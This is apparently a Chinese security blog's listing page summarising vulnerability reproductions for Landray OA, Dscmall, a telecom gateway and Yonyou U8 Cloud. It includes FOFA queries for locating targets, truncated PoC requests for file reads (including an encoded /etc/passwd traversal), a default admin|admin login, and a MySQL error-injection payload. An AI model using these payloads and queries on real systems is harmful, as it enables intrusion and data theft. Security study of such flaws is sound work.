摘要: 蓝凌OA /sys/webservice/hrStaffWebService接口处存在任意文件读取漏洞 FOFA app="Landray-OA系统" POC 文件读取 POST /sys/webservice/hrStaffWebService HTTP/1.1 Host: Content-Typ 阅读全文
posted @ 2024-11-07 10:29 NPC001 阅读(120) 评论(0) 推荐(0) 编辑
摘要: FoFa body="k-login-layer" POC 只在日志里面翻到Linux版本的利用方式 /pub/tools/dowload_soft.jsp?fpath=Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 阅读全文
posted @ 2024-09-27 11:09 NPC001 阅读(13) 评论(0) 推荐(0) 编辑
摘要: FOFA body="移动管理平台-企业管理" POC WindowsGET /client/cdnfile/1C/Windows/win.ini?windows LinuxGET /client/cdnfile/C/proc/self/cmdline?linux 阅读全文
posted @ 2024-09-24 15:40 NPC001 阅读(182) 评论(0) 推荐(0) 编辑
摘要: Dscmall电商商城wholesale_flow接口处存在SQL注入漏洞 FOFA语句 icon_hash="-164358497" SQL注入漏洞POST /wholesale_flow.php?step=ajax_update_cart HTTP/1.1 Host: User-Agent: M 阅读全文
posted @ 2024-05-31 15:38 NPC001 阅读(34) 评论(0) 推荐(0) 编辑
摘要: 电信网关配置管理系统漏洞 fofa语句: body="img/dl.gif" && title="系统登录" 1.弱口令漏洞 弱口令: admin|admin 2.RCE漏洞 RCEPOST /manager/ipping.php HTTP/1.1 Host: Upgrade-Insecure-Re 阅读全文
posted @ 2024-05-11 16:52 NPC001 阅读(206) 评论(0) 推荐(0) 编辑
摘要: 用友U8 Cloud漏洞复现 1. Cloud smartweb2.RPC.d 存在XXE漏洞 漏洞描述 用友U8 Cloud smartweb2.RPC.d存在xml外部实体注入漏洞,攻击者可以通过此漏洞读取系统文件,获取敏感信息等。 fofa语句: app="用友-U8-Cloud" 漏洞:PO 阅读全文
posted @ 2024-05-11 16:10 NPC001 阅读(166) 评论(0) 推荐(0) 编辑
摘要: 目录vulntarget-k 复现准备的第三方工具与脚本环境配置复现攻击机 kail → 跳板机 xxl-jobs Linux攻击机 kail → 跳板机 xxl-jobs Linux → 成员机 nacos-spring Linux攻击机 kail → 跳板机 xxl-jobs Linux → 成 阅读全文
posted @ 2023-11-10 14:46 NPC001 阅读(364) 评论(0) 推荐(0) 编辑
摘要: exp()报错注入 版本要求:5.5< mysql版本 <5.6 payloadand (exp(~(select * from (操作代码) a))) 列子:SELECT * FROM db WHERE db='test' and (exp(~(select * from (SELECT VERS 阅读全文
posted @ 2023-10-29 11:24 NPC001 阅读(52) 评论(0) 推荐(0) 编辑
摘要: MSF与CS的互相派生 阅读全文
posted @ 2023-10-15 17:26 NPC001 阅读(255) 评论(0) 推荐(0) 编辑